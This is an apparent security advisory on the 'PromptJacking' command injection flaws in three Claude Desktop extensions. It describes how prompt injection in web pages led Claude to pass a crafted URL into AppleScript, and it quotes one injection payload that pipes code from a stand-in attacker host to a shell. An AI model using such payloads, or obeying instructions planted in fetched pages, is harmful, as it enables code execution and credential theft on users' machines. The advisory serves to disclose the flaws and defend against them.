Command injection vulnerabilities reported in Claude Desktop extensions enabling Remote Code Execution
Take action: If you use Claude Desktop with the Chrome, iMessage, or Apple Notes extensions, update all extensions immediately to version 0.1.9 or later, because they are immediately vulnerable to executing malicious code that attackers hide in websites browsed by Claude. In general, avoid using AI agents and local tools because they are not properly secured, there is too much rush to deploy new things instead of securing them and attackers can always drop malicious prompt injection in their websites and just wait.
Learn More
Koi Seurityyy is reporting remote code execution vulnerabilities in three official Claude Desktop extensions that could have enabled attackers to execute arbitrary code on users' machines through AI interactions.
The vulnerabilities are affecting the Chrome, iMessage, and Apple Notes connectors. KOI Security dubbed the vulnerabilities collectively as "PromptJacking" and scored them as high severity rating (CVSS score 8.9). The Claude Desktop extensions function as packaged MCP servers distributed as .mcpb bundles, essentially compressed archives containing server code and function manifests. Unlike browser extensions that run in sandboxed environments, these extensions operate fully unsandboxed on users' machines with complete system permissions, enabling them to read any file, execute any command, access stored credentials, and modify system settings.
These vulnerabilities are caused by unsanitized command injection in the Model Context Protocol (MCP) servers that power these extensions. Each affected extension processed user-provided input and passed it directly into AppleScript commands without proper sanitization or escaping, allowing these commands to execute shell operations with full system privileges.
Affected Extensions:
- Chrome connector for Claude Desktop (versions prior to 0.1.9)
- iMessage connector for Claude Desktop (versions prior to 0.1.9)
- Apple Notes connector for Claude Desktop (versions prior to 0.1.9)
The exploitation mechanism uses prompt injection through web content. When users query Claude, the AI assistant routinely fetches and analyzes web pages to answer questions, creating an attack vector. An attacker controlling a search result page or compromising a legitimate website could detect Claude's user agent and serve tailored malicious content
For example, when Claude received a command to open a URL in Chrome, the vulnerable extension would construct an AppleScript string using template literals, directly interpolating the user-provided URL into commands without validation. A maliciously crafted URL containing the payload "& do shell script "curl https://attacker.com/trojan | sh"&" would break out of the string context and inject arbitrary AppleScript commands, triggering shell command execution with full privileges.
In a practical attack scenario, a user asking Claude a simple question such as "Where can I play paddle in Brooklyn?" could trigger the vulnerability if one of the search results pointed to an attacker-controlled page. The attacker's server would detect Claude's user agent and serve a hidden payload, causing Claude to execute injected commands through the vulnerable extension.
The malicious code could then steal SSH keys, exfiltrate AWS credentials, capture browser passwords and session tokens, upload local code repositories, install persistent backdoors, or log keystrokes—all without the user noticing anything unusual.
Anthropic patched these flawws in version 0.1.9 of the affected extensions, which implemented proper string escaping before executing AppleScript commands.
These were official Anthropic extensions distributed, promoted, and trusted as part of the core Claude Desktop experience, raising significant concerns about security practices in the Model Context Protocol ecosystem. As the MCP marketplace expands with contributions from independent developers. The combination of full local access, rapid iteration, and minimal oversight creates serious risk to users.
